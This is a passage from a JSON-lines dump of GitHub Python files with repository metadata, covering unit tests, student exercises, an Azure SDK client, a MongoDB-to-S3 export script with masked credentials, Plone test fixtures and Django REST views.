self.sequence.add_document(self.document1)\n self.sequence.add_document(self.document3)\n self.sequence.add_document(self.document2)\n\n # We expect document2 to erase document3\n # TODO: Finish these on this unittesting level\n\n # SPEC-CONFORMANCE : R9\n def test_increasing_sequence_number(self):\n self.assertGreater(self.document2.sequence_number, self.document1.sequence_number)\n self.assertGreater(self.document3.sequence_number, self.document2.sequence_number)\n\n def test_authors_groups_success_addition(self):\n\n self.assertIsNone(self.sequence.authors_group_identifier)\n\n self.document1.binding.authorsGroupIdentifier = None # making sure it is actually None\n self.sequence.add_document(self.document1)\n\n self.assertIsNone(self.sequence.authors_group_identifier)\n\n self.document2.binding.authorsGroupIdentifier = 'foo'\n\n self.sequence.add_document(self.document2)\n\n self.assertEqual(self.sequence.authors_group_identifier, 'foo')\n\n self.document3.binding.authorsGroupIdentifier = 'bar'\n\n self.assertRaises(\n UnexpectedAuthorsGroupError,\n self.sequence.add_document,\n self.document3\n )\n\n self.document3.binding.authorsGroupIdentifier = None\n\n self.sequence.add_document(\n self.document3\n )\n\n def test_authors_groups_success_check_only(self):\n self.sequence.is_compatible(self.document1)\n\n self.assertIsNone(self.sequence.authors_group_identifier)\n\n self.document2.binding.authorsGroupIdentifier = 'foo'\n self.sequence.is_compatible(self.document2)\n\n self.assertEqual(self.sequence.authors_group_identifier, 'foo')\n","repo_name":"ebu/ebu-tt-live-toolkit","sub_path":"ebu_tt_live/documents/test/test_ebutt3sequence.py","file_name":"test_ebutt3sequence.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"52"} +{"seq_id":"19877161714","text":"# 2017029134\n# 이하민\n\nprint('점수를 입력해 주세요')\n# score를 입력 받아 int 타입으로 수정\nscore = int(input())\n\n# 올바른 점수가 입력 되었다면 학점을, 아니라면 error를 할당.\nif score >= 0 and score < 60:\n grade = '학점 : F'\nelif score >= 60 and score < 80:\n grade = '학점 : B'\nelif score >= 80 and score < 95:\n grade = '학점 : A'\nelif score >= 95 and score <= 100:\n grade = '학점 : A+'\nelse:\n grade = 'error'\n\nprint('your score =', str(score), grade)","repo_name":"hamin7/ITE3035_Python","sub_path":"Python/Midterm_Python/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16289185995","text":"# coding=utf-8\r\n# --------------------------------------------------------------------------\r\n# Copyright (c) Microsoft Corporation. All rights reserved.\r\n# Licensed under the MIT License. See License.txt in the project root for\r\n# license information.\r\n#\r\n# Code generated by Microsoft (R) AutoRest Code Generator.\r\n# Changes may cause incorrect behavior and will be lost if the code is\r\n# regenerated.\r\n# --------------------------------------------------------------------------\r\n\r\nfrom msrest.service_client import ServiceClient\r\nfrom msrest import Serializer, Deserializer\r\nfrom msrestazure import AzureConfiguration\r\nfrom .version import VERSION\r\nfrom .operations.usage_details_operations import UsageDetailsOperations\r\nfrom .operations.operations import Operations\r\nfrom . import models\r\n\r\n\r\nclass ConsumptionManagementClientConfiguration(AzureConfiguration):\r\n \"\"\"Configuration for ConsumptionManagementClient\r\n Note that all parameters used to create this instance are saved as instance\r\n attributes.\r\n\r\n :param credentials: Credentials needed for the client to connect to Azure.\r\n :type credentials: :mod:`A msrestazure Credentials\r\n object`\r\n :param subscription_id: Azure Subscription ID.\r\n :type subscription_id: str\r\n :param str base_url: Service URL\r\n \"\"\"\r\n\r\n def __init__(\r\n self, credentials, subscription_id, base_url=None):\r\n\r\n if credentials is None:\r\n raise ValueError(\"Parameter 'credentials' must not be None.\")\r\n if subscription_id is None:\r\n raise ValueError(\"Parameter 'subscription_id' must not be None.\")\r\n if not isinstance(subscription_id, str):\r\n raise TypeError(\"Parameter 'subscription_id' must be str.\")\r\n if not base_url:\r\n base_url = 'https://management.azure.com'\r\n\r\n super(ConsumptionManagementClientConfiguration, self).__init__(base_url)\r\n\r\n self.add_user_agent('consumptionmanagementclient/{}'.format(VERSION))\r\n self.add_user_agent('Azure-SDK-For-Python')\r\n\r\n self.credentials = credentials\r\n self.subscription_id = subscription_id\r\n\r\n\r\nclass ConsumptionManagementClient(object):\r\n \"\"\"Consumption management client provides access to consumption resources for Azure Web-Direct subscriptions. Other subscription types which were not purchased directly through the Azure web portal are not supported through this preview API.\r\n\r\n :ivar config: Configuration for client.\r\n :vartype config: ConsumptionManagementClientConfiguration\r\n\r\n :ivar usage_details: UsageDetails operations\r\n :vartype usage_details: azure.mgmt.consumption.operations.UsageDetailsOperations\r\n :ivar operations: Operations operations\r\n :vartype operations: azure.mgmt.consumption.operations.Operations\r\n\r\n :param credentials: Credentials needed for the client to connect to Azure.\r\n :type credentials: :mod:`A msrestazure Credentials\r\n object`\r\n :param subscription_id: Azure Subscription ID.\r\n :type subscription_id: str\r\n :param str base_url: Service URL\r\n \"\"\"\r\n\r\n def __init__(\r\n self, credentials, subscription_id, base_url=None):\r\n\r\n self.config = ConsumptionManagementClientConfiguration(credentials, subscription_id, base_url)\r\n self._client = ServiceClient(self.config.credentials, self.config)\r\n\r\n client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}\r\n self.api_version = '2017-04-24-preview'\r\n self._serialize = Serializer(client_models)\r\n self._deserialize = Deserializer(client_models)\r\n\r\n self.usage_details = UsageDetailsOperations(\r\n self._client, self.config, self._serialize, self._deserialize)\r\n self.operations = Operations(\r\n self._client, self.config, self._serialize, self._deserialize)\r\n","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/consumption/consumption_management_client.py","file_name":"consumption_management_client.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"10258012232","text":"# CIS 122 Fall 2021 assignment 7\r\n# Author: Karma Woeser\r\n# Partner: Your Partner\r\n# References: \r\n# Description: list manager assignment\r\n\r\ncommand_lst = ['Add', 'Delete', 'List', 'Clear']\r\ncommand_descrips = ['Add to list', 'Delete Information', 'List Information', 'Clear list']\r\nlst = []\r\n\r\ndef cmd_help():\r\n '''Purpose: To help the user understand the commands\r\n\r\n Returns: The command_lst and command_descrips \r\n '''\r\n print(\"*** Available commands ***\")\r\n for item in range(get_max_list_item_size(t)):\r\n # Prints the command and the description will using the pad_right function to create\r\n # a space between them\r\n print(pad_right(command_lst[item], 10), command_descrips[item])\r\n print(\"Empty to exit\")\r\n\r\n\r\ndef cmd_add(t):\r\n '''Purpose: To add items to the list(lst)\r\n\r\n Arg: t: which is going to be the list(lst)\r\n \r\n Returns: Adds whatever item is inputted to the list(lst)\r\n '''\r\n while True:\r\n add = input(\"Enter Infomation (empty to stop): \")\r\n \r\n if len(add) == 0:\r\n break\r\n # Adds the add input to the list\r\n lst.append(add)\r\n print(\"Added, item count =\", len(lst))\r\n\r\n\r\ndef cmd_delete(t):\r\n '''Purpose: To delete items to the list(lst)\r\n\r\n Arg: t: which is going to be the list(lst)\r\n \r\n Returns: deletes whatever item is inputted to the list(lst)\r\n '''\r\n while True:\r\n if len(lst) == 0:\r\n print(\"There is nothing in the list to delete\")\r\n break\r\n \r\n for items in lst:\r\n print(pad_right(lst.index(items), 2), items)\r\n\r\n delete = input('Enter number to delete (empty to stop): ')\r\n if len(delete) == 0:\r\n break\r\n\r\n # If delete is greater than or equal to the length of the list it's not a possible input\r\n elif int(delete) >= len(lst):\r\n print(\"Enter a number in the index\")\r\n pass\r\n\r\n \r\n else:\r\n # lst[int(delete)].isdigit()\r\n # Deletes the index that is equalivent to the delete input\r\n del lst[int(delete)]\r\n\r\n if len(lst) == 0:\r\n print(\"All items deleted\")\r\n break\r\n \r\n \r\n \r\ndef cmd_list(t):\r\n '''Purpose: Prints the items in the list(lst) and the length of the list\r\n\r\n Arg: t: which is going to be the list(lst)\r\n \r\n Returns: The list and the length of it\r\n '''\r\n if len(lst) == 0:\r\n print(\"List contains\", len(lst), 'item(s)')\r\n\r\n # Prints how many items are in the list and the names of each item on different lines\r\n elif len(lst) > 0:\r\n print(\"List contains\", len(lst), 'item(s)')\r\n for items in lst:\r\n print(items)\r\n\r\n\r\ndef cmd_clear(t):\r\n '''Purpose: Clears the list\r\n\r\n Arg: t: which is going to be the list(lst)\r\n \r\n Returns: How many items were cleared\r\n '''\r\n print(len(lst) ,\"item(s) removed, list empty\")\r\n # Clears the list\r\n lst.clear() \r\n\r\n\r\ndef get_max_list_item_size(t):\r\n '''Purpose: Prints the items in the list(lst) and the length of the list\r\n\r\n Arg: t: which is going to be the list(lst)\r\n \r\n Returns: The list and the length of it\r\n '''\r\n return len(command_lst)\r\n\r\n\r\n\r\n\r\n# Previous assignment\r\ndef pad_string(data, size, dir = 'L', character = ' '):\r\n data = str(data)\r\n if len(data) > size:\r\n return data\r\n elif dir.upper() == 'L':\r\n return character * (size - len(data)) + data\r\n else:\r\n return data + character * (size - len(data))\r\n\r\ndef pad_left(data, size, character = ' '):\r\n return pad_string(data, size, 'L', character)\r\n\r\n\r\ndef pad_right(data, size, character = ' '):\r\n return pad_string(data, size, 'R', character)\r\n\r\n\r\n\r\nwhile True:\r\n t = input(\"Enter a command (? for help): \")\r\n t = t.strip()\r\n\r\n if len(t) == 0:\r\n print(\"Goodbye!\")\r\n break\r\n\r\n # Whatever command is entered that function will be called\r\n elif 'list' in t:\r\n cmd_list(lst)\r\n\r\n\r\n elif 'add' in t:\r\n cmd_add(lst)\r\n\r\n \r\n elif 'clear' in t:\r\n cmd_clear(lst)\r\n\r\n\r\n elif 'del' in t: \r\n cmd_delete(lst)\r\n\r\n \r\n elif '?' in t:\r\n cmd_help()\r\n\r\n\r\n\r\n \r\n\r\n","repo_name":"kwoeser/UO-CODE","sub_path":"CIS 122 - Python/cis122-assign07/cis122-assign07-list-manager.py","file_name":"cis122-assign07-list-manager.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42046465839","text":"#bfs \n\nfrom collections import deque\n\ndef bfs(s, v, g):\n q = deque()\n q.append(s)\n v[s] = True\n while q:\n p = q.popleft()\n print(p, end=' ')\n for i in g[p]:\n if v[i] == False:\n v[i] = True\n q.append(i)\n\ngraph = [[0],\n [2, 3, 8],\n [1, 7],\n [4, 5],\n [3, 5],\n [3, 4],\n [7],\n [6, 8],\n [1, 7]]\n\nv = [False] * 9\nbfs(1, v, graph)\n","repo_name":"SEDO11/Self_Python","sub_path":"이코테/복습/5주차dfs_bfs/bfs(연습).py","file_name":"bfs(연습).py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11300785530","text":"#Import from CSV to Dataframe\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\ndata = pd.read_csv('tips.csv')\n#Calculated column\ndata['total_with_tip'] = data['total_bill'] + data['tip']\nprint(data)\n#Conditional subsetting\ncondition = data.loc[data['smoker'] == 'Yes']\nprint(condition) \n#Correlation \ncorr = data['total_bill'].corr(data['tip'])\nif (corr > 0.8 or corr < -0.8):\n print(\"The Correlation Coefficient between total bill and tip is: \" + str(corr) + \" and is significant\")\nelse:\n print(\"The Correlation Coefficient between total bill and tip is: \" + str(corr) + \" and is not significant\")\n#Data visualisation\nax = data['sex'].value_counts().plot(kind='bar',\n figsize=(10,5),\n title=\"Count of Each Gender\",\n color=['green','purple'])\nax.set_xlabel(\"Gender\")\nax.set_ylabel(\"Frequency\")\nplt.show()","repo_name":"clintondeabreu/ClassActivity11","sub_path":"Activity.py","file_name":"Activity.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"46092691298","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by iFantastic on 15-2-14\n__author__ = 'cluo'\n\nimport logging\nimport threading\nimport time\n#consumer()要设置Condition 才能继续\n#producer() 负责设置条件 并通知其他进程可以继续‰\nlogging.basicConfig(\n level = logging.DEBUG,\n format = '%(asctime)s (%(threadName)-2s) %(message)s'\n)\n\ndef consumer(cond):\n \"\"\"wait fro condition and use the resource\"\"\"\n logging.debug('Starting consumer thread')\n t = threading.currentThread()\n with cond: #condition 使用一个Lock\n cond.wait()\n logging.debug('Resource is alailable to consumer')\n\ndef producer(cond):\n \"\"\"set up the resource to be used by the consumer\"\"\"\n logging.debug('Starting producer thread')\n with cond:\n logging.debug('Making resource available')\n cond.notifyAll()\n\ncondition = threading.Condition()\nc1 = threading.Thread(name = 'c1', target = consumer, args = (condition,))\nc2 = threading.Thread(name = 'c2', target = consumer, args = (condition,))\n\np = threading.Thread(name = 'p', target = producer, args = (condition,))\n\n\nif __name__ == '__main__':\n c1.start()\n time.sleep(2)\n c2.start()\n time.sleep(2)\n p.start()\n","repo_name":"cluo/learingPython","sub_path":"thread/thread_condition.py","file_name":"thread_condition.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"2706283857","text":"class Solution(object):\n def frequencySort(self, s):\n d = {}\n for i in s:\n d[i] = d.get(i, 0) + 1\n order = sorted(d, key = lambda x: -d[x])\n res = ''\n for letter in order:\n res = res + letter * d[letter]\n return res","repo_name":"cvpriccvnips/coding-challenge","sub_path":"leetcode/hash/451-sort-char.py","file_name":"451-sort-char.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72215308326","text":"# import colorgram\r\n#\r\n# colours = colorgram.extract('image.jpg', 10)\r\n# rgb_list = []\r\n# for colour in colours:\r\n# r = colour.rgb.r\r\n# g = colour.rgb.g\r\n# b = colour.rgb.b\r\n# rgb_list.append((r, g, b))\r\n#\r\n# print(rgb_list)\r\n\r\n\r\n\r\nimport turtle as t\r\nfrom turtle import Screen\r\nimport random\r\n\r\ntimmy = t.Turtle()\r\ntimmy.hideturtle()\r\ntimmy.shape(\"turtle\")\r\ntimmy.color(\"blue\")\r\ntimmy.speed('fastest')\r\ntimmy.pensize(20)\r\nt.colormode(255)\r\nspace = 50\r\n\r\n# Get turtle to starting position\r\ntimmy.penup()\r\ntimmy.backward(200)\r\ntimmy.setheading(-90)\r\ntimmy.forward(200)\r\ntimmy.setheading(0)\r\n\r\n\r\ncolor_list = [(121, 96, 85), (188, 160, 123), (71, 99, 123), (132, 73, 87),\r\n (69, 107, 91), (130, 158, 172), (182, 140, 152), (136, 166, 154)]\r\n\r\ndef paint_forward():\r\n timmy.pendown()\r\n timmy.dot(20, random.choice(color_list))\r\n timmy.penup()\r\n timmy.forward(space)\r\n\r\ndef next_position():\r\n timmy.penup()\r\n timmy.setheading(90)\r\n timmy.forward(space)\r\n timmy.setheading(180)\r\n timmy.forward(space * 10)\r\n timmy.setheading(0)\r\n\r\n\r\n# Create painting with 10 x 10 of spots. Each dot is 20 in size and 50 spaces between.\r\nfor _ in range(10):\r\n for _ in range(10):\r\n paint_forward()\r\n next_position()\r\n\r\n\r\nscreen = Screen()\r\nscreen.exitonclick()","repo_name":"findamak/python-course","sub_path":"day-18-hirst-painting/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25528173827","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nimport model_utils.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('products', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Supplier',\n fields=[\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True, serialize=False)),\n ('created', model_utils.fields.AutoCreatedField(verbose_name='created', editable=False, default=django.utils.timezone.now)),\n ('modified', model_utils.fields.AutoLastModifiedField(verbose_name='modified', editable=False, default=django.utils.timezone.now)),\n ('seller_type', models.CharField(max_length=4, choices=[('manu', 'Manufacturer'), ('dist', 'Distributor'), ('comp', 'Compounding Pharmacy'), ('rsell', 'Reseller')])),\n ('sells_rx', models.BooleanField(default=False)),\n ('description', models.TextField()),\n ('manufacturer', models.ManyToManyField(to='products.Manufacturer')),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"mkates/vetcove-legacy","sub_path":"vetcove/suppliers/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3936568898","text":"\"\"\"\nhttps://leetcode.com/problems/reverse-linked-list/\nReverse a singly linked list.\n\nExample:\n\nInput: 1->2->3->4->5->NULL\nOutput: 5->4->3->2->1->NULL\nFollow up:\n\nA linked list can be reversed either iteratively or recursively. Could you implement both?\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution:\n def reverseList(self, head):\n left = None\n while head:\n right = head.next\n head.next = left\n left = head\n head = right\n return left\n","repo_name":"wenjiaaa/Leetcode","sub_path":"P0001_P0500/0206-reverse-linked-list.py","file_name":"0206-reverse-linked-list.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12226226140","text":"from plone import api\nfrom plone.dexterity.content import DexterityContent\nfrom plonegovbr.portal_base.testing import FUNCTIONAL_TESTING\nfrom plonegovbr.portal_base.testing import INTEGRATION_TESTING\nfrom pytest_plone import fixtures_factory\n\nimport pytest\n\n\npytest_plugins = [\"pytest_plone\"]\n\n\nglobals().update(\n fixtures_factory(\n (\n (FUNCTIONAL_TESTING, \"functional\"),\n (INTEGRATION_TESTING, \"integration\"),\n )\n )\n)\n\n\n@pytest.fixture\ndef check_permission():\n def func(obj: DexterityContent, permission: str, role: str) -> bool:\n roles = [role]\n with api.env.adopt_roles(roles):\n return api.user.has_permission(permission=permission, obj=obj)\n\n return func\n\n\n@pytest.fixture\ndef campi_payload() -> list:\n \"\"\"Payload to create two campus items.\"\"\"\n return [\n {\n \"type\": \"Campus\",\n \"id\": \"curitiba\",\n \"title\": \"Campus Curitiba\",\n \"description\": \"Campus Curitiba da UTFPR\",\n \"contact_email\": \"curitiba@utfpr.edu.br\",\n \"contact_website\": \"https://portal.utfpr.edu.br/campus/curitiba\",\n \"contact_phone\": \"+55 (41) 3310-4545\",\n \"address\": \"Av. Sete de Setembro, 3165\",\n \"address_2\": \"Rebouças\",\n \"city\": \"Curitiba\",\n \"state\": \"PR\",\n \"postal_code\": \"80230-901\",\n \"country\": \"BR\",\n },\n {\n \"type\": \"Campus\",\n \"id\": \"campos-centro\",\n \"title\": \"Campos Centro\",\n \"description\": \"IFFluminense Campus Campos Centro\",\n \"contact_email\": \"gabinete.camposcentro@iff.edu.br\",\n \"contact_website\": \"https://iff.edu.br/nossos-campi/campos-centro\",\n \"contact_phone\": \"+55 (22) 2726-2800\",\n \"address\": \"Rua Dr. Siqueira, 273 \",\n \"address_2\": \"Parque Dom Bosco\",\n \"city\": \"Campos dos Goytacazes\",\n \"state\": \"RJ\",\n \"postal_code\": \"28030-130\",\n \"country\": \"BR\",\n },\n ]\n\n\n@pytest.fixture\ndef campi(portal, campi_payload) -> dict:\n \"\"\"Create Campus content items.\"\"\"\n response = {}\n with api.env.adopt_roles(\n [\n \"Manager\",\n ]\n ):\n for data in campi_payload:\n content = api.content.create(container=portal, **data)\n response[content.UID()] = content.title\n return response\n\n\n@pytest.fixture\ndef campus(campi) -> dict:\n \"\"\"Return one Campus.\"\"\"\n content_uid = [key for key in campi.keys()][0]\n brains = api.content.find(UID=content_uid)\n return brains[0].getObject()\n\n\n@pytest.fixture\ndef cursos_payload() -> list:\n \"\"\"Payload to create two curso items.\"\"\"\n return [\n {\n \"type\": \"Curso\",\n \"id\": \"pgp-curitiba\",\n \"title\": \"PGP- Curitiba\",\n \"description\": \"Pós-Graduação em Planejamento e Governança Pública\",\n \"modalidades\": [\"mestrado\"],\n \"areas\": [\"sociais\"],\n },\n {\n \"type\": \"Curso\",\n \"id\": \"tecnico-integrado-em-informatica\",\n \"title\": \"Curso Técnico Integrado em Informática\",\n \"description\": \"A informática está inserida em todos os segmentos...\",\n \"modalidades\": [\"tecnico\"],\n \"areas\": [\"tecnologia\"],\n },\n ]\n\n\n@pytest.fixture\ndef cursos(portal, cursos_payload) -> dict:\n \"\"\"Create Curso content items.\"\"\"\n response = {}\n with api.env.adopt_roles(\n [\n \"Manager\",\n ]\n ):\n for data in cursos_payload:\n content = api.content.create(container=portal, **data)\n response[content.UID()] = content.title\n return response\n\n\n@pytest.fixture\ndef curso(cursos) -> dict:\n \"\"\"Return one Curso.\"\"\"\n content_uid = [key for key in cursos.keys()][0]\n brains = api.content.find(UID=content_uid)\n return brains[0].getObject()\n","repo_name":"plonegovbr/plonegovbr.portal_base","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"13648730333","text":"from pymongo import MongoClient\nimport csv\nimport pandas as pd\nimport boto3\nfrom botocore.exceptions import NoCredentialsError\nclient = MongoClient (\"mongodb+srv://XXXXXX:XXXXXXX@cluster0.kx5fr.mongodb.net/Timestamp\")\ndb=client[\"Timestamp\"]\ncollection_currency = db[\"positions\"]\ncollection_dev = db[\"devices\"]\ncursor1 = collection_currency.find({})\ncursor2 = collection_dev.find({})\nposition_docs=list(cursor1)\ndevice_docs=list(cursor2)\npositions = []\nfor i in position_docs:\n for j in range(0,len(i['positions'])):\n positions.append(i['positions'][j])\nfor i in positions:\n for j in i['attributes'].keys():\n i[j]=i['attributes'][j]\nfor j in positions:\n j.pop('attributes',None)\nkeys = positions[0].keys()\nwith open('positions.csv', 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(positions)\ndevices = []\nfor i in device_docs:\n for j in range(0,len(i['devices'])):\n devices.append(i['devices'][j])\nfor i in devices:\n i.pop('attributes',None)\n i.pop('geofenceIds',None)\n i.pop('phone',None)\n i.pop('model',None)\n i.pop('contact',None)\n i.pop('category',None)\nkeys = devices[0].keys()\nwith open('devices.csv', 'w', newline='') as output_file:\n dict_writer = csv.DictWriter(output_file, keys)\n dict_writer.writeheader()\n dict_writer.writerows(devices)\nACCESS_KEY = 'XXXXXXXXXXXXX'\nSECRET_KEY = 'XXXXXXXXXXXXXX'\ndef upload_to_aws(local_file, bucket, s3_file):\n s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY)\n\n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(\"Upload Successful\")\n return True\n except FileNotFoundError:\n print(\"The file was not found\")\n return False\n except NoCredentialsError:\n print(\"Credentials not available\")\n return False\nuploaded = upload_to_aws('positions.csv', 'projectbigdata2022', 'positions.csv')\nuploaded = upload_to_aws('devices.csv', 'projectbigdata2022', 'devices.csv')\n","repo_name":"MiSalah/Real-Time-Data-Streaming-Analytics-System-for-tracking-Pedestrians","sub_path":"MongoDbToS3/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"72019658726","text":"# Jenny Huang\n# Wallbreakers Cohort #3\n# Week 2\n# Most Common Word\n# https://leetcode.com/problems/most-common-word/\n\nimport re\nfrom collections import defaultdict\nfrom collections import OrderedDict\n\nclass Solution(object): \n def mostCommonWord(self, paragraph, banned):\n \"\"\"\n :type paragraph: str\n :type banned: List[str]\n :rtype: str\n \"\"\"\n # substitute punctuations with spaces \n remove_punc = re.sub(r'[^\\w\\s]',' ',paragraph)\n # lower case paragraph text and split it in a list at the spaces\n new_paragraph = remove_punc.lower().split()\n \n # dictionary to contain occurrences of words\n # key = word\n # value = num of occurrences\n freq_word = defaultdict(int)\n\n # load data into dictionary\n for word in new_paragraph:\n freq_word[word] += 1\n \n # order the dictionary by highest word frequency\n ordered_freq = OrderedDict(sorted(freq_word.items(), key=lambda item: item[1], reverse=True))\n \n # loop through ordered dictionary\n for key in ordered_freq.keys():\n # check key not in banned list\n if key not in banned:\n return key","repo_name":"huangjenny/wallbreakers","sub_path":"week2/most_common_word.py","file_name":"most_common_word.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19713545235","text":"# encoding: utf-8\n\n\"\"\"\nViews for projects application\n\nauthor : raphael.marvie@beta.gouv.fr,guillaume.libersat@beta.gouv.fr\ncreated : 2021-05-26 15:56:20 CEST\n\"\"\"\n\nfrom copy import copy\n\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Count, F, Q\nfrom django.http import Http404\nfrom notifications import models as notifications_models\nfrom rest_framework import mixins, permissions, status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import PermissionDenied\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom urbanvitaliz.utils import get_group_for_site\nfrom urbanvitaliz import verbs\n\nfrom .. import models, signals\nfrom ..serializers import (\n ProjectSerializer,\n ProjectForListSerializer,\n TaskFollowupSerializer,\n TaskNotificationSerializer,\n TaskSerializer,\n UserProjectStatusForListSerializer,\n UserProjectStatusSerializer,\n)\n\n########################################################################\n# REST API\n########################################################################\n\n\nclass ProjectDetail(APIView):\n \"\"\"Retrieve a project\"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self, pk):\n try:\n return models.Project.on_site.get(pk=pk)\n except models.Project.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n p = self.get_object(pk)\n context = {\"request\": request}\n serializer = ProjectSerializer(p, context=context)\n return Response(serializer.data)\n\n def patch(self, request, pk, format=None):\n p = self.get_object(pk)\n context = {\"request\": request, \"view\": self, \"format\": format}\n serializer = ProjectSerializer(\n p, context=context, data=request.data, partial=True\n )\n if serializer.is_valid():\n # old = copy(p)\n serializer.save()\n # if new:\n # signals.project_project_updated.send(\n # sender=self, old_one=old, new_one=new\n # )\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProjectList(APIView):\n \"\"\"List all user project status\"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n\n def get(self, request, format=None):\n projects = fetch_the_site_projects(request.site, request.user)\n context = {\"request\": request}\n\n serializer = ProjectForListSerializer(projects, context=context, many=True)\n return Response(serializer.data)\n\n\ndef fetch_the_site_projects(site, user):\n \"\"\"Returns the complete project list of site for advisor user\n\n Here we face a n+1 fetching problem that happens at multiple levels\n implying an explosition of requests\n The intent is to fetch each kind of objects in one request and then to\n reattach the information to the appropriate object.\n \"\"\"\n projects = list(\n models.Project.on_site.for_user(user)\n .order_by(\"-created_on\", \"-updated_on\")\n .prefetch_related(\"commune\")\n .prefetch_related(\"commune__department\")\n .prefetch_related(\"switchtenders__profile__organization\")\n )\n\n ids = [p.id for p in projects]\n\n # fetch all related site project switchtender to annotate furthemore the project\n switchtendering = {\n ps[\"project_id\"]: ps[\"is_observer\"]\n for ps in models.ProjectSwitchtender.objects.filter(\n site=site, switchtender=user, project_id__in=ids\n ).values(\"project_id\", \"is_observer\")\n }\n\n # update project statuses with the right project and switchtendering statuses\n for p in projects:\n p.is_switchtender = p.id in switchtendering\n p.is_observer = switchtendering.get(p.id, False)\n\n # associate related notification to their projects\n update_projects_with_their_notifications(site, user, projects)\n\n return projects\n\n\ndef update_projects_with_their_notifications(site, user, projects):\n \"\"\"Fetch all the related notifications and associate them w/ their projects\"\"\"\n\n project_ct = ContentType.objects.get_for_model(models.Project)\n\n advisor_group = get_group_for_site(\"advisor\", site)\n advisors = [\n int(advisor) for advisor in advisor_group.user_set.values_list(\"id\", flat=True)\n ]\n\n unread_notifications = (\n notifications_models.Notification.on_site.filter(recipient=user)\n .filter(target_content_type=project_ct.pk)\n .unread()\n .order_by(\"target_object_id\")\n )\n\n # fetch the related notifications\n all_unread_notifications = (\n unread_notifications.values(project_id=F(\"target_object_id\"))\n .annotate(count=Count(\"id\", distinct=True))\n .annotate(\n unread_public_messages=Count(\n \"id\", filter=Q(verb=verbs.Conversation.PUBLIC_MESSAGE)\n )\n )\n .annotate(\n unread_private_messages=Count(\n \"id\", filter=Q(verb=verbs.Conversation.PRIVATE_MESSAGE)\n )\n )\n .annotate(\n new_recommendations=Count(\"id\", filter=Q(verb=verbs.Recommendation.CREATED))\n )\n )\n notifications = {n[\"project_id\"]: n for n in all_unread_notifications}\n\n # Specific request for collaborator activity as it relies on exclusion\n collaborator_activity = (\n unread_notifications.exclude(actor_object_id__in=advisors)\n .values(project_id=F(\"target_object_id\"))\n .annotate(activity=Count(\"id\", disctint=True))\n )\n collaborators = {n[\"project_id\"]: n[\"activity\"] for n in collaborator_activity}\n\n # the empty dict is going to be used read only, so sharing same object\n empty = {\n \"count\": 0,\n \"has_collaborator_activity\": False,\n \"unread_public_messages\": 0,\n \"unread_private_messages\": 0,\n \"new_recommendations\": 0,\n }\n\n # for each project associate the corresponding notifications\n for p in projects:\n p.notifications = notifications.get(str(p.id), empty)\n active = bool(collaborators.get(str(p.id)))\n p.notifications[\"has_collaborator_activity\"] = active\n\n\nclass TaskFollowupViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for 